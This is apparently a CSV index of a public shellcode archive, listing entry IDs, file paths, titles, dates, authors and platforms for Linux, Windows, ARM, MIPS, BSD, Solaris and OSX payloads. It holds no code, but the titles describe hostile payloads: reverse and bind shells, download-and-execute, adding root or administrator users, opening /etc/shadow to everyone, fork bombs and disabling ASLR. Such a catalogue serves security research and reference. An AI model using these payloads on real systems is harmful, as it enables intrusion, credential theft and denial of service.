|
13609,shellcodes/lin_x86/13609.c,"Linux/x86 - execve /bin/cat /etc/passwd Shellcode (43 bytes)",2010-02-09,fb1h2s,shellcode,lin_x86
|
||||||
|
13614,shellcodes/win_x86/13614.c,"Windows XP SP3 x86 (English) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,win_x86
|
||||||
|
13615,shellcodes/win_x86/13615.c,"Windows XP SP2 x86 (Turkish) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,win_x86
|
||||||
|
13627,shellcodes/lin_x86/13627.c,"Linux/x86 - execve /bin/sh Shellcode (8 bytes)",2010-02-23,"JungHoon Shin",shellcode,lin_x86
|
||||||
|
13628,shellcodes/lin_x86/13628.c,"Linux/x86 - execve /bin/sh Shellcode (21 bytes) (2)",2010-02-27,ipv,shellcode,lin_x86
|
||||||
|
13630,shellcodes/win_x86/13630.c,"Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes)",2010-02-28,"Hazem mofeed",shellcode,win_x86
|
||||||
|
13631,shellcodes/win_x86/13631.c,"Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes)",2010-03-01,"Hazem mofeed",shellcode,win_x86
|
||||||
|
13632,shellcodes/lin_x86/13632.c,"Linux/x86 - Disable modsecurity Shellcode (64 bytes)",2010-03-04,sekfault,shellcode,lin_x86
|
||||||
|
13635,shellcodes/win_x86/13635.txt,"Windows x86 - JITed Stage-0 Shellcode",2010-03-07,"Alexey Sintsov",shellcode,win_x86
|
||||||
|
13636,shellcodes/win_x86/13636.c,"Windows x86 - JITed exec notepad Shellcode",2010-03-08,"Alexey Sintsov",shellcode,win_x86
|
||||||
|
13639,shellcodes/win_x86/13639.c,"Windows XP Professional SP2 (Italian) - calc.exe Shellcode (36 bytes)",2010-03-11,Stoke,shellcode,win_x86
|
||||||
|
13642,shellcodes/win_x86/13642.txt,"Windows XP SP2 x86 - write.exe + ExitProcess WinExec Shellcode (16 bytes)",2010-03-18,czy,shellcode,win_x86
|
||||||
|
13645,shellcodes/windows/13645.c,"Windows - Egghunter JITed Stage-0 Shellcode",2010-03-20,"Alexey Sintsov",shellcode,windows
|
||||||
|
13647,shellcodes/win_x86/13647.txt,"Windows XP SP3 x86 (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes)",2010-03-24,"lord Kelvin",shellcode,win_x86
|
||||||
|
13648,shellcodes/win_x86/13648.rb,"Windows x86 - MessageBox Shellcode (Metasploit)",2010-03-24,corelanc0d3r,shellcode,win_x86
|
||||||
|
13649,shellcodes/windows/13649.txt,"Windows XP/Vista/7 - Egghunter JITed Stage-0 Adjusted Universal Shellcode",2010-03-27,"Alexey Sintsov",shellcode,windows
|
||||||
|
13661,shellcodes/lin_x86/13661.txt,"Linux/x86 - Bind Netcat Shell (13377/TCP) Shellcode",2010-04-02,anonymous,shellcode,lin_x86
|
||||||
|
13669,shellcodes/lin_x86/13669.c,"Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)",2010-04-14,Magnefikko,shellcode,lin_x86
|
||||||
|
13670,shellcodes/lin_x86-64/13670.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (2)",2010-04-14,Magnefikko,shellcode,lin_x86-64
|
||||||
|
13671,shellcodes/lin_x86/13671.c,"Linux/x86 - DoS Badger Game Shellcode (6 bytes)",2010-04-14,Magnefikko,shellcode,lin_x86
|
||||||
|
13673,shellcodes/lin_x86/13673.c,"Linux/x86 - DoS SLoc Shellcode (55 bytes)",2010-04-14,Magnefikko,shellcode,lin_x86
|
||||||
|
13675,shellcodes/lin_x86/13675.c,"Linux/x86 - execve(_a->/bin/sh_) Local-only Shellcode (14 bytes)",2010-04-17,Magnefikko,shellcode,lin_x86
|
||||||
|
13676,shellcodes/lin_x86/13676.c,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (33 bytes)",2010-04-18,sm0k,shellcode,lin_x86
|
||||||
|
13677,shellcodes/lin_x86/13677.c,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (29 bytes)",2010-04-19,Magnefikko,shellcode,lin_x86
|
||||||
|
13679,shellcodes/generator/13679.py,"Linux - write() + exit(0) Shellcode (Generator)",2010-04-20,Stoke,shellcode,generator
|
||||||
|
13680,shellcodes/lin_x86/13680.c,"Linux/x86 - Fork Bomb Polymorphic Shellcode (30 bytes)",2010-04-21,"Jonathan Salwan",shellcode,lin_x86
|
||||||
|
13681,shellcodes/lin_x86/13681.c,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (2)",2010-04-21,"Jonathan Salwan",shellcode,lin_x86
|
||||||
|
13682,shellcodes/lin_x86/13682.c,"Linux/x86 - setreud(getuid()_ getuid()) + execve(_/bin/sh_) Shellcode (34 bytes)",2010-04-22,Magnefikko,shellcode,lin_x86
|
||||||
|
13688,shellcodes/lin_x86-64/13688.c,"Linux/x86-64 - reboot(POWER_OFF) Shellcode (19 bytes)",2010-04-25,zbt,shellcode,lin_x86-64
|
||||||
|
13691,shellcodes/lin_x86-64/13691.c,"Linux/x86-64 - execve /bin/sh Shellcode (30 bytes)",2010-04-25,zbt,shellcode,lin_x86-64
|
||||||
|
13692,shellcodes/lin_x86/13692.c,"Linux/x86 - Sends 'Phuck3d!' To All Terminals Shellcode (60 bytes)",2010-04-25,condis,shellcode,lin_x86
|
||||||
|
13697,shellcodes/lin_x86/13697.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) Shellcode (33 bytes)",2010-05-04,"Jonathan Salwan",shellcode,lin_x86
|
||||||
|
13698,shellcodes/lin_x86/13698.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) Polymorphic Shellcode (57 bytes)",2010-05-05,"Jonathan Salwan",shellcode,lin_x86
|
||||||
|
13699,shellcodes/win_x86/13699.txt,"Windows XP SP2 (French) - Download File (http://www.site.com/nc.exe_) + Execute (c:\backdor.exe) Shellcode",2010-05-10,Crack_MaN,shellcode,win_x86
|
||||||
|
13702,shellcodes/lin_x86/13702.c,"Linux/x86 - execve(_/usr/bin/wget__ _aaaa_); Shellcode (42 bytes)",2010-05-17,"Jonathan Salwan",shellcode,lin_x86
|
||||||
|
13703,shellcodes/lin_x86/13703.txt,"Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,lin_x86
|
||||||
|
13704,shellcodes/solaris_x86/13704.c,"Solaris/x86 - execve(_/bin/sh___/bin/sh__NULL) Shellcode (27 bytes)",2010-05-20,"Jonathan Salwan",shellcode,solaris_x86
|
||||||
|
13707,shellcodes/solaris_x86/13707.c,"Solaris/x86 - Halt Shellcode (36 bytes)",2010-05-20,"Jonathan Salwan",shellcode,solaris_x86
|
||||||
|
13709,shellcodes/solaris_x86/13709.c,"Solaris/x86 - Reboot() Shellcode (37 bytes)",2010-05-21,"Jonathan Salwan",shellcode,solaris_x86
|
||||||
|
13711,shellcodes/solaris_x86/13711.c,"Solaris/x86 - Download File (http://shell-storm.org/exemple-solaris) Shellcode (79 bytes)",2010-05-25,"Jonathan Salwan",shellcode,solaris_x86
|
||||||
|
13712,shellcodes/lin_x86/13712.c,"Linux/x86 - Disable ASLR Security Shellcode (106 bytes)",2010-05-25,"Jonathan Salwan",shellcode,lin_x86
|
||||||
|
13715,shellcodes/lin_x86/13715.c,"Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode (83 bytes)",2010-05-27,agix,shellcode,lin_x86
|
||||||
|
13716,shellcodes/lin_x86/13716.c,"Linux/x86 - Fork Bomb Alphanumeric Shellcode (117 bytes)",2010-05-27,agix,shellcode,lin_x86
|
||||||
|
13719,shellcodes/win_x86-64/13719.txt,"Windows 7 Professional SP1 x64 (FR) - Beep Shellcode (39 bytes)",2010-05-28,agix,shellcode,win_x86-64
|
||||||
|
13722,shellcodes/lin_x86/13722.c,"Linux/x86 - setuid(0) + chmod 0666 /etc/shadow Polymorphic Shellcode (61 bytes)",2010-05-31,antrhacks,shellcode,lin_x86
|
||||||
|
13723,shellcodes/lin_x86/13723.c,"Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/shadow Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,lin_x86
|
||||||
|
13724,shellcodes/lin_x86/13724.c,"Linux/x86 - Kill All Running Process Shellcode (11 bytes)",2010-05-31,gunslinger_,shellcode,lin_x86
|
||||||
|
13725,shellcodes/lin_x86/13725.txt,"Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/passwd Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,lin_x86
|
||||||
|
13726,shellcodes/lin_x86/13726.txt,"Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,lin_x86
|
||||||
|
13728,shellcodes/lin_x86/13728.c,"Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve (_/bin/sh_) Shellcode (39 bytes)",2010-06-01,gunslinger_,shellcode,lin_x86
|
||||||
|
13729,shellcodes/win_x86-64/13729.txt,"Windows 7 x64 - cmd Shellcode (61 bytes)",2010-06-01,agix,shellcode,win_x86-64
|
||||||
|
13730,shellcodes/lin_x86/13730.c,"Linux/x86 - unlink _/etc/shadow_ Shellcode (33 bytes)",2010-06-02,gunslinger_,shellcode,lin_x86
|
||||||
|
13731,shellcodes/lin_x86/13731.c,"Linux/x86 - Hard Reboot Shellcode (29 bytes)",2010-06-03,gunslinger_,shellcode,lin_x86
|
||||||
|
13732,shellcodes/lin_x86/13732.c,"Linux/x86 - Hard Reboot Shellcode (33 bytes)",2010-06-03,gunslinger_,shellcode,lin_x86
|
||||||
|
13733,shellcodes/solaris/13733.c,"Solaris/x86 - SystemV killall Command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",shellcode,solaris
|
||||||
|
13742,shellcodes/lin_x86/13742.c,"Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes)",2010-06-06,gunslinger_,shellcode,lin_x86
|
||||||
|
13743,shellcodes/lin_x86/13743.c,"Linux/x86 - Give All Users Root Access When Executing /bin/sh Shellcode (45 bytes)",2010-06-06,gunslinger_,shellcode,lin_x86
|
||||||
|
14334,shellcodes/lin_x86/14334.c,"Linux/x86 - Reverse Netcat Shell (8080/TCP) Shellcode (76 bytes)",2010-07-11,blake,shellcode,lin_x86
|
||||||
|
13828,shellcodes/windows/13828.c,"Windows - MessageBoxA Shellcode (238 bytes)",2010-06-11,RubberDuck,shellcode,windows
|
||||||
|
13875,shellcodes/solaris_x86/13875.c,"Solaris/x86 - Sync() + reboot() + exit(0) Shellcode (48 bytes)",2010-06-14,"Jonathan Salwan",shellcode,solaris_x86
|
||||||
|
13908,shellcodes/lin_x86-64/13908.c,"Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",shellcode,lin_x86-64
|
||||||
|
13910,shellcodes/lin_x86/13910.c,"Linux/x86 - Bind TCP Shell (31337/TCP) + setreuid(0_0) Polymorphic Shellcode (131 bytes)",2010-06-17,gunslinger_,shellcode,lin_x86
|
||||||
|
13915,shellcodes/lin_x86-64/13915.txt,"Linux/x86-64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",shellcode,lin_x86-64
|
||||||
|
13943,shellcodes/lin_x86-64/13943.c,"Linux/x86-64 - Add Root User (shell-storm/leet) Shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",shellcode,lin_x86-64
|
||||||
|
14014,shellcodes/win_x86/14014.pl,"Windows XP SP3 (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes)",2010-06-24,d0lc3,shellcode,win_x86
|
||||||
|
14116,shellcodes/arm/14116.txt,"Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm
|
||||||
|
14052,shellcodes/windows/14052.c,"Windows - cmd.exe + ExitProcess WinExec Shellcode (195 bytes)",2010-06-25,RubberDuck,shellcode,windows
|
||||||
|
14097,shellcodes/arm/14097.c,"Linux/ARM - execve(_/bin/sh___/bin/sh__0) Shellcode (30 bytes)",2010-06-28,"Jonathan Salwan",shellcode,arm
|
||||||
|
14119,shellcodes/lin_x86/14119.c,"Linux/x86 - execve /bin/sh Polymorphic Shellcode (116 bytes)",2010-06-29,gunslinger_,shellcode,lin_x86
|
||||||
|
14142,shellcodes/arm/14142.c,"Linux/ARM - chmod 0777 /etc/shadow Polymorphic Shellcode (84 bytes)",2010-06-30,"Florian Gaultier",shellcode,arm
|
||||||
|
14122,shellcodes/arm/14122.txt,"Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes)",2010-06-29,"Florian Gaultier",shellcode,arm
|
||||||
|
14139,shellcodes/arm/14139.c,"Linux/ARM - Disable ASLR Security Shellcode (102 bytes)",2010-06-30,"Jonathan Salwan",shellcode,arm
|
||||||
|
14190,shellcodes/arm/14190.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL); XOR 88 Encoded Polymorphic Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",shellcode,arm
|
||||||
|
14216,shellcodes/lin_x86/14216.c,"Linux/x86 - Bind TCP /bin/sh Shell (64533/TCP) Shellcode (97 bytes)",2010-07-05,Magnefikko,shellcode,lin_x86
|
||||||
|
14218,shellcodes/linux/14218.c,"Linux - Write SUID Root Shell (/tmp/.hiddenshell) Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,shellcode,linux
|
||||||
|
14219,shellcodes/linux/14219.c,"Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,shellcode,linux
|
||||||
|
14221,shellcodes/windows/14221.html,"Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Null-Free Shellcode",2010-07-05,"Alexey Sintsov",shellcode,windows
|
||||||
|
14234,shellcodes/linux/14234.c,"Linux - Bind TCP Shell (6778/TCP) XOR Encoded Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,shellcode,linux
|
||||||
|
14235,shellcodes/linux/14235.c,"Linux - Bind Netcat Shell (31337/TCP) Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,shellcode,linux
|
||||||
|
14261,shellcodes/generator/14261.c,"ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",shellcode,generator
|
||||||
|
14276,shellcodes/linux/14276.c,"Linux - Find All Writeable Folder In FileSystem Polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,shellcode,linux
|
||||||
|
14288,shellcodes/win_x86/14288.asm,"Windows x86 - Write-to-file ('pwned' ./f.txt) Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",shellcode,win_x86
|
||||||
|
14305,shellcodes/lin_x86-64/14305.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes)",2010-07-09,10n1z3d,shellcode,lin_x86-64
|
||||||
|
14332,shellcodes/lin_x86/14332.c,"Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (8080/TCP) Shellcode (75 bytes)",2010-07-11,blake,shellcode,lin_x86
|
||||||
|
14691,shellcodes/lin_x86/14691.c,"Linux/x86 - execve /bin/sh Polymorphic Null-Free Shellcode (46 bytes)",2010-08-19,Aodrulez,shellcode,lin_x86
|
||||||
|
14697,shellcodes/windows/14697.c,"Windows XP SP3 (English) - MessageBoxA Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous",shellcode,windows
|
||||||
|
14795,shellcodes/bsd_x86/14795.c,"BSD/x86 - Bind TCP Shell (2525/TCP) Shellcode (167 bytes)",2010-08-25,beosroot,shellcode,bsd_x86
|
||||||
|
14873,shellcodes/win_x86/14873.asm,"Windows x86 - Egghunter Checksum Routine Shellcode (18 bytes)",2010-09-02,dijital1,shellcode,win_x86
|
||||||
|
14907,shellcodes/arm/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes)",2010-09-05,"Jonathan Salwan",shellcode,arm
|
||||||
|
15063,shellcodes/win_x86/15063.c,"Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)",2010-09-20,ZoRLu,shellcode,win_x86
|
||||||
|
15116,shellcodes/windows/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2) - MessageBox Shellcode (ARM)",2010-09-26,"Celil Ünüver",shellcode,windows
|
||||||
|
15136,shellcodes/windows/15136.cpp,"Windows Mobile 6.5 TR - Phone Call Shellcode",2010-09-27,"Celil Ünüver",shellcode,windows
|
||||||
|
15202,shellcodes/win_x86/15202.c,"Windows XP Professional SP3 x86 (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",shellcode,win_x86
|
||||||
|
15203,shellcodes/win_x86/15203.c,"Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",shellcode,win_x86
|
||||||
|
15314,shellcodes/arm/15314.asm,"ARM - Bind TCP Shell (0x1337/TCP) Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
|
||||||
|
15315,shellcodes/arm/15315.asm,"ARM - Bind TCP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/TCP) Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
|
||||||
|
15316,shellcodes/arm/15316.asm,"ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
|
||||||
|
15317,shellcodes/arm/15317.asm,"ARM - ifconfig eth0 192.168.0.2 up Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
|
||||||
|
15616,shellcodes/arm/15616.c,"Linux/ARM - Add Root User (shell-storm/toor) Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",shellcode,arm
|
||||||
|
15618,shellcodes/osx/15618.c,"OSX/Intel x86-64 - setuid shell Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",shellcode,osx
|
||||||
|
15712,shellcodes/generator/15712.rb,"ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator)",2010-12-09,"Jonathan Salwan",shellcode,generator
|
||||||
|
15879,shellcodes/win_x86/15879.txt,"Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode",2010-12-31,Skylined,shellcode,win_x86
|
||||||
|
16025,shellcodes/generator/16025.c,"FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:1337/TCP) Shellcode (81 bytes) (Generator)",2011-01-21,Tosh,shellcode,generator
|
||||||
|
16026,shellcodes/bsd_x86/16026.c,"BSD/x86 - Bind TCP Shell (31337/TCP) + Fork Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,bsd_x86
|
||||||
|
16283,shellcodes/win_x86/16283.txt,"Windows x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,shellcode,win_x86
|
||||||
|
17432,shellcodes/sh4/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",shellcode,sh4
|
||||||
|
17194,shellcodes/lin_x86/17194.txt,"Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,lin_x86
|
||||||
|
17224,shellcodes/osx/17224.s,"OSX/Intel x86-64 - Reverse TCP /bin/sh Shell (FFFFFFFF:4444/TCP) Shellcode (131 bytes)",2011-04-29,hammackj,shellcode,osx
|
||||||
|
17323,shellcodes/windows/17323.c,"Windows - Add Local Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes)",2011-05-25,RubberDuck,shellcode,windows
|
||||||
|
20195,shellcodes/lin_x86/20195.c,"Linux/x86 - Disable ASLR Security Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,lin_x86
|
||||||
|
17326,shellcodes/generator/17326.rb,"Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",shellcode,generator
|
||||||
|
17371,shellcodes/lin_x86/17371.txt,"Linux/x86 - Reverse TCP SSL Shell (localhost:8080/TCP) Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",shellcode,lin_x86
|
||||||
|
17439,shellcodes/sh4/17439.c,"Linux/SuperH (sh4) - Add Root User (shell-storm/toor) Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",shellcode,sh4
|
||||||
|
17545,shellcodes/win_x86/17545.txt,"Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,shellcode,win_x86
|
||||||
|
17559,shellcodes/lin_x86/17559.c,"Linux/x86 - Egghunter Null-Free Shellcode (29 bytes)",2011-07-21,"Ali Raheem",shellcode,lin_x86
|
||||||
|
17564,shellcodes/osx/17564.asm,"OSX - Universal ROP + Reverse TCP Shell Shellcode",2011-07-24,pa_kt,shellcode,osx
|
||||||
|
17940,shellcodes/linux_mips/17940.c,"Linux/MIPS - execve /bin/sh Shellcode (52 bytes)",2011-10-07,entropy,shellcode,linux_mips
|
||||||
|
17996,shellcodes/generator/17996.c,"Linux/MIPS - XOR Encoder Shellcode (60 bytes) (Generator)",2011-10-18,entropy,shellcode,generator
|
||||||
|
18154,shellcodes/sh4/18154.c,"Linux/SuperH (sh4) - setuid(0); + execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes)",2011-11-24,"Jonathan Salwan",shellcode,sh4
|
||||||
|
18162,shellcodes/linux_mips/18162.c,"Linux/MIPS - execve /bin/sh Shellcode (48 bytes)",2011-11-27,rigan,shellcode,linux_mips
|
||||||
|
18163,shellcodes/linux_mips/18163.c,"Linux/MIPS - Add Root User (rOOt/pwn3d) Shellcode (164 bytes)",2011-11-27,rigan,shellcode,linux_mips
|
||||||
|
18197,shellcodes/lin_x86-64/18197.c,"Linux/x86-64 - execve /bin/sh Shellcode (52 bytes)",2011-12-03,X-h4ck,shellcode,lin_x86-64
|
||||||
|
18226,shellcodes/linux_mips/18226.c,"Linux/MIPS - Reverse TCP Shell (0x7a69/TCP) Shellcode (168 bytes)",2011-12-10,rigan,shellcode,linux_mips
|
||||||
|
18227,shellcodes/linux_mips/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,shellcode,linux_mips
|
||||||
|
18294,shellcodes/lin_x86/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd Polymorphic Shellcode",2011-12-31,pentesters.ir,shellcode,lin_x86
|
||||||
|
18379,shellcodes/lin_x86/18379.c,"Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes)",2012-01-17,rigan,shellcode,lin_x86
|
||||||
|
18585,shellcodes/lin_x86-64/18585.s,"Linux/x86-64 - Add Root User (t0r/Winner) Shellcode (189 bytes)",2012-03-12,0_o,shellcode,lin_x86-64
|
||||||
|
18885,shellcodes/lin_x86/18885.c,"Linux/x86 - execve /bin/dash Shellcode (42 bytes)",2012-05-16,X-h4ck,shellcode,lin_x86
|
||||||
|
20196,shellcodes/lin_x86/20196.c,"Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,lin_x86
|
||||||
|
21252,shellcodes/arm/21252.asm,"Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (10.1.1.2:0x1337/TCP) Shellcode (72 bytes)",2012-09-11,midnitesnake,shellcode,arm
|
||||||
|
21253,shellcodes/arm/21253.asm,"Linux/ARM (Raspberry Pi) - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (30 bytes)",2012-09-11,midnitesnake,shellcode,arm
|
||||||
|
21254,shellcodes/arm/21254.asm,"Linux/ARM (Raspberry Pi) - chmod 0777 /etc/shadow Shellcode (41 bytes)",2012-09-11,midnitesnake,shellcode,arm
|
||||||
|
40363,shellcodes/win_x86/40363.c,"Windows x86 - Bind TCP Password (damn_it!$$##@;*#) Shell Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",shellcode,win_x86
|
||||||
|
22489,shellcodes/windows/22489.cpp,"Windows XP Professional SP3 - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes)",2012-11-05,b33f,shellcode,windows
|
||||||
|
40890,shellcodes/win_x86-64/40890.c,"Windows x64 - Bind TCP Shell (4444/TCP) Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",shellcode,win_x86-64
|
||||||
|
23622,shellcodes/lin_x86/23622.c,"Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",shellcode,lin_x86
|
||||||
|
24318,shellcodes/windows/24318.c,"Windows - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,shellcode,windows
|
||||||
|
25497,shellcodes/lin_x86/25497.c,"Linux/x86 - Reverse TCP Shell (192.168.1.10:31337/TCP) Shellcode (92 bytes)",2013-05-17,"Russell Willis",shellcode,lin_x86
|
||||||
|
40387,shellcodes/hardware/40387.nasm,"Cisco ASA - Authentication Bypass _EXTRABACON_ (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",shellcode,hardware
|
||||||
|
27132,shellcodes/hardware/27132.txt,"MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",shellcode,hardware
|
||||||
|
27180,shellcodes/arm/27180.asm,"Windows RT ARM - Bind TCP Shell (4444/TCP) Shellcode",2013-07-28,"Matthew Graeber",shellcode,arm
|
||||||
|
40827,shellcodes/lin_x86/40827.c,"Linux/x86 - Egghunter Shellcode (31 bytes)",2016-11-25,"Filippo Bersani",shellcode,lin_x86
|
||||||
|
28474,shellcodes/lin_x86/28474.c,"Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse TCP /bin/sh Shell (192.168.122.1:43981/TCP) Shellcode",2013-09-23,"Ryan Fenno",shellcode,lin_x86
|
||||||
|
40334,shellcodes/win_x86/40334.c,"Windows x86 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Persistent Access Shellcode (494 Bytes)",2016-09-05,"Roziul Hasan Khan Shifat",shellcode,win_x86
|
||||||
|
28996,shellcodes/windows/28996.c,"Windows - MessageBox Null-Free Shellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",shellcode,windows
|
||||||
|
29436,shellcodes/linux_mips/29436.asm,"Linux/MIPS (Little Endian) - Reverse TCP /bin/sh Shell (192.168.1.177:31337/TCP) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",shellcode,linux_mips
|
||||||
|
40352,shellcodes/win_x86/40352.c,"Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 Bytes)",2016-09-08,"Roziul Hasan Khan Shifat",shellcode,win_x86
|
||||||
|
33836,shellcodes/windows/33836.txt,"Windows - Add Administrator User (BroK3n/BroK3n) Null-Free Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",shellcode,windows
|
||||||
|
34060,shellcodes/lin_x86/34060.c,"Linux/x86 - execve /bin/sh + Socket Re-Use Shellcode (50 bytes)",2014-07-14,ZadYree,shellcode,lin_x86
|
||||||
|
34262,shellcodes/lin_x86/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",shellcode,lin_x86
|
||||||
|
34592,shellcodes/lin_x86/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",shellcode,lin_x86
|
||||||
|
34667,shellcodes/lin_x86-64/34667.c,"Linux/x86-64 - Reverse TCP /bin/bash Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes)",2014-09-15,MadMouse,shellcode,lin_x86-64
|
||||||
|
34778,shellcodes/lin_x86/34778.c,"Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",shellcode,lin_x86
|
||||||
|
35205,shellcodes/lin_x86-64/35205.txt,"Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL); Position Independent Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,shellcode,lin_x86-64
|
||||||
|
35519,shellcodes/lin_x86/35519.txt,"Linux/x86 - rmdir Shellcode (37 bytes)",2014-12-11,kw4,shellcode,lin_x86
|
||||||
|
35586,shellcodes/lin_x86-64/35586.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) + Password (Z~r0) Null-Free Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",shellcode,lin_x86-64
|
||||||
|
35587,shellcodes/lin_x86-64/35587.c,"Linux/x86-64 - Reverse TCP Password (Z~r0) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",shellcode,lin_x86-64
|
||||||
|
